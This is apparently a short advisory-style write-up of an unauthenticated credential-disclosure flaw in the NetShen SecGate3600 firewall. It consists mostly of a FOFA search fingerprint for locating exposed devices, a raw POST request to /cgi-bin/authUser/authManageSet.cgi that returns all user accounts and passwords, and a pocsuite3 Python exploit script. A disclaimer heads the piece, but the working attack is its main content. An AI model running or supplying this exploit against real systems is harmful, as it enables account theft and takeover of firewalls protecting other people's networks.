Disclaimer
The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.
Vulnerability description
NetShen SecGate3600 firewall is an innovative firewall product that comprehensively responds to traditional network attacks and advanced threats. It is widely used at the business network boundaries of government agencies, various enterprises and organizations to achieve network security domain isolation, refined access control and advanced threats. Detection and other functions. The firewall authManageSet.cgi interface has a sensitive information leakage vulnerability. An attacker can use this vulnerability to obtain the username and password of administrators, auditors and other accounts without authorization, and log in to the control backend.
fofa statement
sec_gate_image/button_normal.gifpoc
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 23 Aug 2013 11:17:08 GMT
Content-Type: application/x-www-form-urlencoded
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=ascpoc script
pocsuite framework for scripts
# _*_ coding:utf-8 _*_
# @Time : 2023/12/16
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class SecGate3600_information_leakage(POCBase):
pocDesc = '''网神SecGate3600防火墙敏感信息泄露漏洞'''
author = '炼金术师诸葛亮'
createDate = '2023-12-16'
name = '网神SecGate3600防火墙敏感信息泄露漏洞'
def _verify(self):
result = {}
url = self.url+ '/cgi-bin/authUser/authManageSet.cgi'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'If-Modified-Since': 'Fri, 23 Aug 2013 11:17:08 GMT',
"Content-Type": "application/x-www-form-urlencoded"
}
try:
data = 'type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc'
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200 and 'id' in response.text:
result['VerifyInfo'] = {}
return self.parse_output(result)
except Exception as e:
pass
register_poc(SecGate3600_information_leakage)Script exploit
